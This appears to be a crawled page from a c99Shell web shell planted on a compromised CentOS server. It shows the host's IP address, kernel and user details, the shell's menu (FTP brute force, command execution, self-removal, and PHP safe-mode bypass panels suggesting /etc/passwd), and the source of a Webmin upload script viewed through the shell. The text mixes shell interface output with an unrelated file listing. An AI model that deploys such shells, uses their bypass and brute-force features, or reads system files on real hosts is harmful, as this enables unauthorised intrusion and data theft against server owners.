110.164.51.230 - phpshell

!c99Shell v. 1.0 pre-release build #16!
Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 EDT 2010 i686 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /usr/libexec/webmin/file/ drwxr-xr-x Free 50.94 GB of 127.8 GB (39.86%) Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686

uid=48(apache) gid=48(apache) groups=48(apache)

Safe-mode: OFF (not secure)

/usr/libexec/webmin/file/ drwxr-xr-x
Free 50.94 GB of 127.8 GB (39.86%)
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout


#!/usr/bin/perl
# upform.cgi
# Display the upload form

$trust_unknown_referers = 1;
require './file-lib.pl';
$disallowed_buttons{'upload'} && &error($text{'ebutton'});
&ReadParse(undef, undef, 1);
&popup_header($text{'upload_title'});
$upid = time().$$;
$args = ($in{'extra'} ? $in{'extra'}."&" : "?")."id=$upid";

print &ui_form_start("upload.cgi$args", "form-data", undef,
             &read_parse_mime_javascript($upid, [ "file" ]));
print &ui_table_start($text{'upload_title'}, "width=100%", 2);

print &ui_table_row($text{'upload_file'},
            &ui_upload("file", 20));

print &ui_table_row($text{'upload_dir'},
            &ui_textbox("dir", $in{'dir'}, 20)."\n".
            &ui_submit($text{'upload_ok'}));

if ($dostounix == 1) {
    # Do DOS conversion?
    print &ui_table_row($text{'upload_conv'},
                &ui_yesno_radio("dos", 0));
    }

if ($unarchive == 1) {
    # Unzip file?
    print &ui_table_row($text{'upload_zip'},
                &ui_radio("zip", int($config{'defzip'}),
                [ [ 2, $text{'upload_yes'} ],
                  [ 1, $text{'yes'} ],
                  [ 0, $text{'no'} ] ]));
    }

if ($running_as_root) {
    # Upload as user
    $user = $config{'defuser'} || "root";
    if ($user eq "*") {
        # Get from parent directory
        local @st = stat(&unmake_chroot($in{'dir'}));
        $user = getpwuid($st[4]);
        }
    print &ui_table_row($text{'upload_user'},
                &ui_user_textbox("user", $user));
    }

print &ui_table_end();
print &ui_form_end();
&popup_footer();

:: Shadow's tricks :D ::
Useful Commands Warning. Kernel may be alerted using higher levels	Kernel Info:

:: Preddy's tricks :D ::
Php Safe-Mode Bypass (Read Files) File: eg: /etc/passwd	Php Safe-Mode Bypass (List Directories): Dir: eg: /etc/

:: Command execute ::
Enter:	Select: